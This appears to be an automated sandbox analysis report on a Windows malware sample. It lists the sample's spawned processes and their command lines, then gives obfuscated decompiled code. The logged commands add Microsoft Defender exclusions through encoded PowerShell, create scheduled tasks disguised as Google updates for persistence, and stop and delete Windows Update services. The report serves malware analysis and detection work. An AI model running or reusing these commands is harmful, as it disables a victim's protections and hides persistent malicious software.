Commandline:	powershell -enC QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAnAEMAOgBcAFUAcwBlAHIAcwBcAFIAZQB2AGUAbABpAG4AJwAsACAAJwBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzACcAKQAgAC0ARgBvAHIAYwBlAA==
Imagebase:	0x13d0000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 5200, Parent PID: 5400

General

Target ID:	26
Start time:	12:20:11
Start date:	24/11/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -enC UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AUwB1AGIAbQBpAHQAUwBhAG0AcABsAGUAcwBDAG8AbgBzAGUAbgB0ACAAMgA=
Imagebase:	0x13d0000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 4780, Parent PID: 5508

General

Target ID:	27
Start time:	12:20:11
Start date:	24/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: schtasks.exePID: 4252, Parent PID: 5400

General

Target ID:	28
Start time:	12:20:12
Start date:	24/11/2022
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	SCHTASKS /Create /TR "C:\Users\user\AppData\Local\Google\chrome.exe" /TN "GoogleUpdateTask{56c41dbe-92cb-4ab7-b423-bd40cb65f9fe}" /SC ONLOGON /F /RL HIGHEST
Imagebase:	0xe20000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 3732, Parent PID: 5200

General

Target ID:	29
Start time:	12:20:12
Start date:	24/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 4956, Parent PID: 4252

General

Target ID:	30
Start time:	12:20:13
Start date:	24/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 1536, Parent PID: 6104

General

Target ID:	31
Start time:	12:20:13
Start date:	24/11/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
Imagebase:	0x7ff707bb0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 4536, Parent PID: 6104

General

Target ID:	32
Start time:	12:20:14
Start date:	24/11/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
Imagebase:	0x7ff707bb0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 2620, Parent PID: 1536

General

Target ID:	33
Start time:	12:20:14
Start date:	24/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 5276, Parent PID: 1080

General

Target ID:	34
Start time:	12:20:14
Start date:	24/11/2022
Path:	C:\Users\user\AppData\Local\Google\chrome.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Google\chrome.exe
Imagebase:	0x10000
File size:	6423552 bytes
MD5 hash:	8CD1EA50F8F4C45055400E70DA52B326
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 5296, Parent PID: 6104

General

Target ID:	35
Start time:	12:20:14
Start date:	24/11/2022
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
Imagebase:	0x7ff6bcc00000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 1172, Parent PID: 4536

General

Target ID:	36
Start time:	12:20:14
Start date:	24/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: schtasks.exePID: 1304, Parent PID: 5400

General

Target ID:	37
Start time:	12:20:14
Start date:	24/11/2022
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	SCHTASKS /Create /TR "C:\Users\user\AppData\Local\Google\chrome.exe" /TN "GoogleUpdateTaskUAC{0625ad4f-50a5-4d12-b200-288d853de0d5}" /SC HOURLY /F /MO 1 /RL HIGHEST
Imagebase:	0xe20000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 4296, Parent PID: 5296

General

Target ID:	38
Start time:	12:20:14
Start date:	24/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: sc.exePID: 2432, Parent PID: 1536

General

Target ID:	39
Start time:	12:20:14
Start date:	24/11/2022
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop UsoSvc
Imagebase:	0x7ff78ad30000
File size:	69120 bytes
MD5 hash:	D79784553A9410D15E04766AAAB77CD6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5620, Parent PID: 1304

General

Target ID:	40
Start time:	12:20:14
Start date:	24/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powercfg.exePID: 5684, Parent PID: 4536

General

Target ID:	41
Start time:	12:20:14
Start date:	24/11/2022
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	powercfg /x -hibernate-timeout-ac 0
Imagebase:	0x7ff607910000
File size:	94720 bytes
MD5 hash:	7C749DC22FCB1ED42A87AFA986B720F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: GoogleUpdate.exePID: 5752, Parent PID: 5400

General

Target ID:	42
Start time:	12:20:15
Start date:	24/11/2022
Path:	C:\Windows\GoogleUpdate.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\GoogleUpdate.exe
Imagebase:	0x1b0000
File size:	154456 bytes
MD5 hash:	9A66A3DE2589F7108426AF37AB7F6B41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs

Show Windows behavior

Chronological Activities

Analysis Process: sc.exePID: 5940, Parent PID: 1536

General

Target ID:	43
Start time:	12:20:16
Start date:	24/11/2022
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop WaaSMedicSvc
Imagebase:	0x7ff78ad30000
File size:	69120 bytes
MD5 hash:	D79784553A9410D15E04766AAAB77CD6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powercfg.exePID: 5944, Parent PID: 4536

General

Target ID:	44
Start time:	12:20:16
Start date:	24/11/2022
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	powercfg /x -hibernate-timeout-dc 0
Imagebase:	0x7ff607910000
File size:	94720 bytes
MD5 hash:	7C749DC22FCB1ED42A87AFA986B720F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: sc.exePID: 1800, Parent PID: 1536

General

Target ID:	45
Start time:	12:20:18
Start date:	24/11/2022
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop wuauserv
Imagebase:	0x7ff78ad30000
File size:	69120 bytes
MD5 hash:	D79784553A9410D15E04766AAAB77CD6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powercfg.exePID: 2364, Parent PID: 4536

General

Target ID:	46
Start time:	12:20:18
Start date:	24/11/2022
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	powercfg /x -standby-timeout-ac 0
Imagebase:	0x7ff607910000
File size:	94720 bytes
MD5 hash:	7C749DC22FCB1ED42A87AFA986B720F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: sc.exePID: 5388, Parent PID: 1536

General

Target ID:	47
Start time:	12:20:19
Start date:	24/11/2022
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop bits
Imagebase:	0x7ff78ad30000
File size:	69120 bytes
MD5 hash:	D79784553A9410D15E04766AAAB77CD6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powercfg.exePID: 4008, Parent PID: 4536

General

Target ID:	48
Start time:	12:20:20
Start date:	24/11/2022
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	powercfg /x -standby-timeout-dc 0
Imagebase:	0x7ff607910000
File size:	94720 bytes
MD5 hash:	7C749DC22FCB1ED42A87AFA986B720F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: sc.exePID: 1920, Parent PID: 1536

General

Target ID:	49
Start time:	12:20:20
Start date:	24/11/2022
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop dosvc
Imagebase:	0x7ff78ad30000
File size:	69120 bytes
MD5 hash:	D79784553A9410D15E04766AAAB77CD6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: GoogleUpdate.exePID: 4968, Parent PID: 5400

General

Target ID:	50
Start time:	12:20:21
Start date:	24/11/2022
Path:	C:\Windows\GoogleUpdate.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\GoogleUpdate.exe
Imagebase:	0x1b0000
File size:	154456 bytes
MD5 hash:	9A66A3DE2589F7108426AF37AB7F6B41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: reg.exePID: 1756, Parent PID: 1536

General

Target ID:	51
Start time:	12:20:21
Start date:	24/11/2022
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
Imagebase:	0x7ff6eee40000
File size:	72704 bytes
MD5 hash:	E3DACF0B31841FA02064B4457D44B357
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: reg.exePID: 4280, Parent PID: 1536

General

Target ID:	52
Start time:	12:20:26
Start date:	24/11/2022
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
Imagebase:	0x7ff6eee40000
File size:	72704 bytes
MD5 hash:	E3DACF0B31841FA02064B4457D44B357
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: GoogleUpdate.exePID: 1952, Parent PID: 5400

General

Target ID:	53
Start time:	12:20:26
Start date:	24/11/2022
Path:	C:\Windows\GoogleUpdate.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\GoogleUpdate.exe
Imagebase:	0x1b0000
File size:	154456 bytes
MD5 hash:	9A66A3DE2589F7108426AF37AB7F6B41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: reg.exePID: 2436, Parent PID: 1536

General

Target ID:	54
Start time:	12:20:27
Start date:	24/11/2022
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
Imagebase:	0x7ff6eee40000
File size:	72704 bytes
MD5 hash:	E3DACF0B31841FA02064B4457D44B357
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: reg.exePID: 3100, Parent PID: 1536

General

Target ID:	55
Start time:	12:20:28
Start date:	24/11/2022
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
Imagebase:	0x7ff6eee40000
File size:	72704 bytes
MD5 hash:	E3DACF0B31841FA02064B4457D44B357
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 688, Parent PID: 1080

General

Target ID:	56
Start time:	12:20:28
Start date:	24/11/2022
Path:	C:\Users\user\AppData\Local\Google\chrome.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Google\chrome.exe
Imagebase:	0x10000
File size:	6423552 bytes
MD5 hash:	8CD1EA50F8F4C45055400E70DA52B326
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 5616, Parent PID: 5276

General

Target ID:	57
Start time:	12:20:30
Start date:	24/11/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -enC QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAnAEMAOgBcAFUAcwBlAHIAcwBcAFIAZQB2AGUAbABpAG4AJwAsACAAJwBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzACcAKQAgAC0ARgBvAHIAYwBlAA==
Imagebase:	0x13d0000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: 6iWK0k820U.exePID: 5796, Parent PID: 3452COMMON

Execution Graph

Execution Coverage:	16.8%
Dynamic/Decrypted Code Coverage:	2%
Signature Coverage:	12.2%
Total number of Nodes:	1025
Total number of Limit Nodes:	18

Executed Functions

Function 004055D0 Relevance: 52.7, APIs: 22, Strings: 7, Instructions: 1984
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 81%

			E004055D0() {
				signed int _v8;
				signed int _v12;
				signed int _v13;
				signed int _v20;
				short _v24;
				char* _v28;
				intOrPtr _v32;
				signed int _v36;
				signed char* _v40;
				void* _v44;
				void* _v48;
				char _v49;
				signed int _v56;
				signed int _v60;
				unsigned int _v64;
				signed int _v68;
				signed int _v72;
				signed char* _v76;
				void* _v80;
				intOrPtr* _v88;
				signed int* _v92;
				intOrPtr _v96;
				long _v100;
				signed short* _v104;
				signed int _v105;
				void* _v112;
				signed int* _v116;
				intOrPtr _v120;
				signed int _v121;
				signed int _v128;
				intOrPtr* _v132;
				void* _v136;
				intOrPtr _v144;
				intOrPtr _v148;
				signed int _v152;
				signed int _v153;
				intOrPtr _v160;
				signed int _v164;
				intOrPtr _v172;
				char _v176;
				signed int _v177;
				signed int _v184;
				short _v188;
				signed int _v192;
				signed int* _v196;
				signed int _v197;
				char _v204;
				intOrPtr* _v208;
				signed short* _v212;
				void* _v216;
				long _v220;
				intOrPtr _v224;
				short _v228;
				intOrPtr _v232;
				intOrPtr* _v236;
				signed int* _v240;
				signed int _v244;
				signed int* _v248;
				char _v249;
				signed int _v256;
				signed int* _v260;
				long _v264;
				signed int _v268;
				intOrPtr _v272;
				signed char* _v276;
				signed int _v277;
				void* _v284;
				signed int _v288;
				intOrPtr _v292;
				signed int _v296;
				signed int _v300;
				signed int* _v304;
				void* _v308;
				signed char* _v312;
				intOrPtr _v316;
				short _v320;
				long _v324;
				signed short* _v328;
				signed int _v329;
				signed int _v336;
				signed int _v340;
				signed int* _v344;
				intOrPtr _v348;
				signed int _v352;
				intOrPtr _v356;
				signed int _v360;
				signed int _v364;
				void _v365;
				signed int _v366;
				signed int _v372;
				void* _v376;
				int _v380;
				char* _v384;
				signed int _v388;
				signed int _v392;
				struct _CRITICAL_SECTION _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				char _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				signed int _v452;
				signed int _t1166;
				signed char* _t1217;
				signed char* _t1241;
				signed char* _t1253;
				signed char* _t1262;
				signed char* _t1323;
				signed char* _t1327;
				void* _t1339;
				char* _t1406;
				signed int _t1495;
				signed int _t1503;
				signed char* _t1505;
				signed char* _t1580;
				signed char* _t1591;
				void* _t1597;
				signed int _t1622;
				signed char _t1630;
				signed char* _t1651;
				signed char* _t1667;
				signed char* _t1670;
				signed char* _t1685;
				signed char* _t1695;
				signed char* _t1703;
				signed char* _t1713;
				signed char* _t1716;
				signed char _t1719;
				signed char* _t1724;
				signed char* _t1768;
				signed char _t1770;
				signed char _t1773;
				short* _t1819;
				signed int _t1836;
				signed char* _t1839;
				signed int _t1846;
				signed int _t1850;
				signed char* _t1959;
				signed int _t1971;
				signed int _t1984;
				signed char* _t1998;
				signed char* _t2003;
				signed char* _t2004;
				signed char* _t2009;
				signed int _t2057;
				signed int _t2097;
				signed char* _t2111;
				signed char* _t2194;
				signed char* _t2208;
				signed char* _t2221;
				signed int _t2227;
				signed char* _t2261;
				signed int _t2308;
				short* _t2321;
				signed char* _t2334;
				signed char* _t2341;
				signed char* _t2374;
				signed char* _t2401;
				signed char* _t2412;
				signed char* _t2429;
				signed char* _t2479;
				void* _t2511;

				_v177 = 0x17;
				_v348 = 0x5011;
				_v296 = 0xda4;
				_v428 = _v296 & 0x0000ffff;
				if(_v428 == 0xda4) {
					if(_v177 > 0x65) {
						L81:
						_v296 = _v296 & 0x3d7;
						_v177 = _v177 >> 4;
						_v296 = _v296 & 0x0000ffff ^ 0x00000bb9;
						E00407930(_v296, 0x15, 0xd, _v177 & 0x000000ff, 0xab);
						goto L83;
					}
					_v192 = 0x5d5;
					_v277 = 0xa0;
					_v432 = _v177;
					if(_v432 == 0x17) {
						 *0x41b004 = _v192 - 0x358;
						_v148 = 0x4ef4;
						_v365 = _v277;
						_v72 = 0x74a1;
						_v164 = _v72;
						_v300 = _v296;
						_v153 = _v365;
					} else {
						if(_v432 == 0x6d) {
							_v296 = _v296 & 0x0000ffff | 0x00000c98;
							_v277 = (_v277 & 0x000000ff) << 5;
							E00407960(_v192, _v177, _v177 & 0x000000ff, 0x2e);
						}
					}
					 *0x43e208 = 0x7f9d;
					_v32 = 0xad05;
					_t1622 =  *0x43e208; // 0xffff8063
					_v36 = _t1622;
					_v272 = 0x6caf;
					if((_v365 & 0x000000ff) + (_v153 & 0x000000ff) >= (_v277 & 0x000000ff)) {
						_v420 = _v72;
						_v436 = _v36;
						if(_v436 == 0x7f9d) {
							_t1166 =  *0x43e208; // 0xffff8063
							_v392 = _t1166;
							 *0x41b006 = (_v277 & 0x000000ff) - (_v153 & 0x000000ff);
							do {
								_v164 = _v72 & _v420;
								_v420 = _v164 - _v72;
								_v392 = _v36 +  *0x43e208;
								_v153 = (_v365 & 0x000000ff) - (_v277 & 0x000000ff);
								_v420 = _v72 + _v164;
								_v420 = _v164 | _v72;
								_t1630 =  *0x43e208; // 0xffff8063
								_v36 = _v392 << _t1630;
								_v164 = _v72 >> _v420;
								_v192 =  *0x41b004 ^ 0x000006cc;
								_v177 = _v177 & 0x00000012;
								_v300 = (_v296 & 0x0000ffff) + 0xc28;
								_v365 = (_v153 & 0x000000ff) - (_v277 & 0x000000ff);
								_v36 = _v392 -  *0x43e208;
								_v348 = _v348 - 0xe2;
								_v164 = _v72 + _v420;
								_v44 = GetCurrentThread();
								_v365 = (_v153 & 0x000000ff) - (_v277 & 0x000000ff);
								 *0x41b006 = _v277 & 0x000000ff & _v365 & 0x000000ff;
								_v36 = _v392 +  *0x43e208;
								_v420 = _v72 - _v164;
								_v36 = _v392 +  *0x43e208;
								_v300 = (_v296 & 0x0000ffff) << 0xb;
								_v277 = (_v153 & 0x000000ff) >> (_v365 & 0x000000ff);
							} while (_v348 > 0x25b1);
							_v440 = _v192;
							if(_v440 == 0x3e) {
								 *0x41b004 = _v192 | 0x00000770;
								_v177 = _v177 ^ 0x0000000b;
								_v153 = _v277 & 0x000000ff & _v365 & 0x000000ff;
								_t2097 =  *0x43e208; // 0xffff8063
								_v392 = _t2097 - _v36;
								E00407870(_v72, _v72);
							} else {
								_v72 = _v420 + _v164;
								_v360 = _v72;
								_v360 = _v72 - _v420;
								 *0x41b007 = _v177 + 0x3a;
								if((_v296 & 0x0000ffff) + 0xeed == (_v300 & 0x0000ffff)) {
									_v420 = _v72 & _v164;
								} else {
									_v12 = _v300;
									_t1597 = CreateFileW(L"Dd7\\fZ\\QcW\\isu", 0x80000000, 1, 0, 4, 0x80, 0); // executed
									_v48 = _t1597;
									_v197 = _v153;
									_v388 = _v36;
									_v360 = _v72 * _v420;
								}
							}
							_v56 = _v392;
							__imp__AssignProcessToJobObject(0, 0);
							_v153 = (_v197 & 0x000000ff) - (_v277 & 0x000000ff);
							_v356 = 0x82a0;
							asm("cdq");
							_v12 = (_v296 & 0x0000ffff) / (_v300 & 0x0000ffff);
							_v312 =  &_v177;
							 *0x43e200 = 0x41b006;
							_v104 =  &_v192;
							do {
								_v392 = _v56 << _v388;
								_v72 = _v164 | _v420;
								_t1651 =  *0x43e200; // 0x41b006
								_v197 =  *_t1651 & 0x000000ff ^ _v277 & 0x000000ff;
								_v296 = (_v300 & 0x0000ffff) >> (_v12 & 0x0000ffff);
								_v360 = _v72 + _v164;
								_v388 = _v56 & _v36;
								 *_v104 =  *_v104 - _v192;
								_t2111 =  *0x43e200; // 0x41b006
								 *_t2111 = (_v153 & 0x000000ff) + (_v365 & 0x000000ff);
								 *_v312 =  *_v312 -  *0x41b007;
								_v197 = (_v277 & 0x000000ff) + (_v365 & 0x000000ff);
								_v56 = _v388 - _v36;
								_v420 = _v164 + _v360;
								_v420 = _v72 - _v360;
								_v72 = _v420 & _v360;
								_v360 = _v72 ^ _v420;
								_v192 =  *0x41b004 <<  *_v104;
								 *0x41b007 =  *_v312 | _v177;
								_t1667 =  *0x43e200; // 0x41b006
								_v365 = ( *_t1667 & 0x000000ff) >> (_v153 & 0x000000ff);
								_v300 = (_v12 & 0x0000ffff) + (_v296 & 0x0000ffff);
								_v388 = _v56 + _v36;
								_v36 = _v56 &  *0x43e208;
								_t1670 =  *0x43e200; // 0x41b006
								_v277 = ( *_t1670 & 0x000000ff) - (_v365 & 0x000000ff);
								 *_v312 = _v177 +  *0x41b007;
								_v164 = _v72 - _v360;
								_v392 = _v56 + _v36;
								_t1217 =  *0x43e200; // 0x41b006
								 *0x41b006 = ( *_t1217 & 0x000000ff) - (_v153 & 0x000000ff);
								_v164 = _v420 + _v360;
								_v12 = (_v300 & 0x0000ffff) - (_v296 & 0x0000ffff);
								_v277 = ( *0x41b006 & 0x000000ff) + (_v365 & 0x000000ff);
								_v56 = _v392 | _v36;
								_v420 = _v164 << _v72;
								_v177 =  *_v312 ^  *0x41b007;
								_v192 =  *0x41b004 >>  *_v104;
								_v296 = _v300 & 0x0000ffff & _v12 & 0x0000ffff;
								_t1685 =  *0x43e200; // 0x41b006
								 *0x41b006 = (_v365 & 0x000000ff) - ( *_t1685 & 0x000000ff);
								_v272 = _v272 + 0xe0;
								_v264 = GetFileSize(_v48,  &_v324);
								_v36 = _v388 + _v56;
								_v164 = _v360 & _v420;
								_v164 = _v420 - _v72;
								_v36 = _v392 + _v56;
								_v420 = _v72 - _v164;
								 *_v312 =  *_v312 +  *0x41b007;
								 *_v312 = _v177 -  *0x41b007;
								_v360 = _v164 | _v72;
								_t1241 =  *0x43e200; // 0x41b006
								 *_t1241 = (_v153 & 0x000000ff) << (_v277 & 0x000000ff);
								_v72 = _v360 >> _v420;
							} while (_v272 != 0xb1cf);
							_v8 = _v360;
							_t1695 =  *0x43e200; // 0x41b006
							_v365 =  *_t1695 & 0x000000ff ^ _v153 & 0x000000ff;
							_v184 = _v296;
							_v216 = GetCurrentThread();
							_v20 =  *_v104;
							_v76 =  &_v177;
							_v36 = _v388 & _v56;
							_v360 = _v72 + _v164;
							 *0x43e20c = _v164;
							_v105 = _v197;
							__imp__AssignProcessToJobObject(0, 0);
							if(_v360 - _v8 >= _v420 - _v164) {
								_v304 =  &_v36;
								do {
									 *_v104 =  *_v104 ^ _v192;
									_v12 = _v300 & 0x0000ffff | _v296 & 0x0000ffff;
									_t1703 =  *0x43e200; // 0x41b006
									_t1253 =  *0x43e200; // 0x41b006
									 *_t1253 = ( *_t1703 & 0x000000ff) >> (_v153 & 0x000000ff);
									_v360 = _v8 << _v420;
									_v56 = _v392 & _v388;
									_v8 = _v72 +  *0x43e20c;
